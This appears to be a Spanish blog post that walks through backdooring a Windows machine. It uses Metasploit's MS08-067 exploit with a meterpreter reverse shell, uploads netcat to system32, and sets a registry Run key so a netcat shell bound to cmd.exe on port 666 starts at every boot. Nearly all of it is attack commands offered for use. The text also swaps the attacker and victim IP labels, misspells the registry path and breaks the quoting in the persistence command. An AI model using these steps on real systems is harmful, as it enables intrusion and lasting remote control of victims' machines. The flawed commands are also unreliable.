hoy les traigo com hacer un backdoor a un window$ con 'Metasploit' ( el dios de dioses ) y el netcat (nc)
si usan un poco la imaginacion se puede hacer un monton de cosas
primero copiamos este archivo que es el netcat para windows al escritorio para un acceso mas rapido
root@bt:~# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
ahora abrimos el metasploit y comenzamos la configuracion
root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi)) > set lhost 192.168.1.102 (IP victima)
msf exploit(ms08_067_netapi)) > set rhost 192.168.1.103 (nuestra IP)
msf exploit(ms08_067_netapi)) > exploit
usa vez que allamos explotando la vulnerabilidad y tengamos acceso a meterpreter empezamos a configurar el backdoor
meterpreter > upload /root/Desktop/nc.exe C:\\WINDOWS\\system32\\
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reg setval -k HKLM\\Software\\Windows\\CurrentVerion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 666 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reboot
el windows se reiniciara, y ejecutara nuestro backdoor al inicio.
y ahora nos conectamos que el netcat de nuestra maquina
root@bt:~# nc 192.168.1.102 666
Listo :D
0 comentarios:
Publicar un comentario